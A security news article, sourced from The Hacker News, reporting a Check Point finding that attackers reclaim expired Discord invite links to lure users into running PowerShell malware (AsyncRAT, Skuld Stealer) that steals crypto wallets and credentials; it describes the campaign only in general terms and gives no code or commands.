A sinister cyber campaign is hijacking expired Discord invite links to trick users into installing powerful malware—stealing crypto wallets, passwords, and browser data while hiding in plain sight.
Key Points at a Glance
- Hackers exploit Discord’s vanity link system to redirect users to malicious servers
- Payloads include AsyncRAT and a custom Skuld Stealer targeting crypto wallets
- Social engineering trick called ClickFix convinces users to execute PowerShell malware
- Malware exfiltrates stolen data via trusted platforms like GitHub and Discord
Cybercriminals have uncovered a subtle vulnerability in Discord’s invite system, and they’re using it to deliver some of the most dangerous malware targeting crypto wallets and personal data. Security experts at Check Point have sounded the alarm over a new campaign that takes expired or deleted Discord invite links—once seen as trustworthy—and reclaims them using Discord’s vanity link feature. The result? Unsuspecting users are being silently redirected into a trap.
The attackers aren’t just hijacking these links—they’re creating entire malicious servers that impersonate real communities. Once inside, users are asked to verify their identity via a sleek-looking interface. But that “Verify” button does more than it promises. Behind it lies ClickFix, a deceptive social engineering tactic that tricks users into running copied PowerShell commands. These commands download and launch malware from remote servers—unleashing AsyncRAT and Skuld Stealer onto the victim’s machine.
AsyncRAT, a powerful remote access trojan, gives hackers full control over the infected system. Using dead drop resolvers and Pastebin as a relay, it communicates with its command-and-control server under the radar. Meanwhile, the Skuld Stealer, written in Go, scours the device for Discord data, browser credentials, and most critically, cryptocurrency wallet information. It’s designed to extract seed phrases and replace legitimate crypto wallet files like those used by Exodus and Atomic with trojanized versions sourced from GitHub.
To make detection even harder, the entire malware delivery and data exfiltration chain uses familiar cloud platforms like GitHub, Bitbucket, Pastebin, and even Discord’s own webhook API. That means most traffic looks completely legitimate to antivirus programs and firewalls.
The scope of this operation is vast. One variant of the loader was disguised as a game hacktool, downloaded hundreds of times from Bitbucket. Victims are spread across the U.S., Europe, and Asia, signaling a globally coordinated effort. Discord has since disabled the malicious bot used to facilitate the attack, but the vulnerability in link reuse remains unpatched—leaving the door open for future campaigns.
This campaign reveals the risks lurking in the overlooked corners of digital infrastructure. A seemingly harmless expired invite link can become the starting point for full system compromise. For crypto holders and casual Discord users alike, vigilance is no longer optional.
Source: The Hacker News
Enjoying our articles?
We don’t show ads — so you can focus entirely on the story, without pop-ups or distractions. We don’t do sponsored content either, because we want to stay objective and only write about what truly fascinates us. If you’d like to help us keep going — buy us a coffee. It’s a small gesture that means a lot. Click here – Thank You!
